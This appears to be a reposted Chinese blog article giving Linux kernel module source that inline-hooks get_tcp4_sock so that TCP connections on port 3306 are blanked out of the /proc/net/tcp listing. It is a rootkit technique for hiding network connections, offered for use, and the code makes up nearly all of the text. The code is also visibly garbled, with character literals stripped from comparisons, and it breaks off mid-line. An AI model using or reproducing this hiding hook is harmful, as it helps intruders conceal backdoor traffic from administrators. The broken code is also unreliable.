Linux下隐藏网络连接的另一种方法

文章由LinuxBoy分享于2019-03-24 11:03:32热评（311）

Linux下隐藏网络连接的另一种方法

直接inline hook住get_tcp4_sock这个函数就行了，只不过需要重新实现下get_tcp4_sock的功能，在作下过滤。比较简单，代码如下：

#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/types.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <linux/fs.h>
#include <linux/kmod.h>
#include <linux/file.h>
#include <linux/sched.h>
#include <linux/mm.h>
#include <linux/slab.h>
#include <linux/spinlock.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include <asm/termbits.h>
#include <asm/ioctls.h>
#include <linux/icmp.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

__u32 wnps_in_aton(const char *str)
{
        unsigned long l;
        unsigned int val;
        int i;

        l = 0;
        for (i = 0; i < 4; i++) {
                l <<= 8;
                if (*str != ) {
                        val = 0;
                        while (*str != && *str != .) {
                                val *= 10;
                                val += *str - 0;
                                str++;
                        }
                        l |= val;
                        if (*str != )
                                str++;
                }
        }

return(htonl(l));
}

void new_get_tcp4_sock(struct sock *sk, struct seq_file *f, int i, int *len)
{
        int timer_active;
        unsigned long timer_expires;
        struct tcp_sock *tp = tcp_sk(sk);
        const struct inet_connection_sock *icsk = inet_csk(sk);
        struct inet_sock *inet = inet_sk(sk);
        __be32 dest = inet->daddr;
        __be32 src = inet->rcv_saddr;
        __u16 destp = ntohs(inet->dport);
        __u16 srcp = ntohs(inet->sport);

printk("!! in new_get_tcp4_sock. ");

        if (icsk->icsk_pending == ICSK_TIME_RETRANS) {
                timer_active    = 1;
                timer_expires   = icsk->icsk_timeout;
        } else if (icsk->icsk_pending == ICSK_TIME_PROBE0) {
                timer_active    = 4;
                timer_expires   = icsk->icsk_timeout;
        } else if (timer_pending(&sk->sk_timer)) {
                timer_active    = 2;
                timer_expires   = sk->sk_timer.expires;
        } else {
                timer_active    = 0;
                timer_expires = jiffies;
        }

/*
    if (src == wnps_in_aton("127.0.0.1")) {
        printk("got 127.0.0.1");
        return ;
    }
*/
        if (srcp == 3306 || destp == 3306) {
                printk("got 3306! ");
        seq_printf(f, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X %02X:%08lX "
                        "%08X %5d %8d %lu %d %p %lu %lu %u %u %d%n",
                0, 0, 0, 0, 0, 0,
                tp->write_seq - tp->snd_una,
                sk->sk_state == TCP_LISTEN ? sk->sk_ack_backlog :
                                             (tp->rcv_nxt - tp->copied_seq),
                timer_active,
                jiffies_to_clock_t(timer_expires - jiffies),
                icsk->icsk_retransmits,
                sock_i_uid(sk),
          &nb

推荐文章：

Linux下隐藏网络连接的另一种方法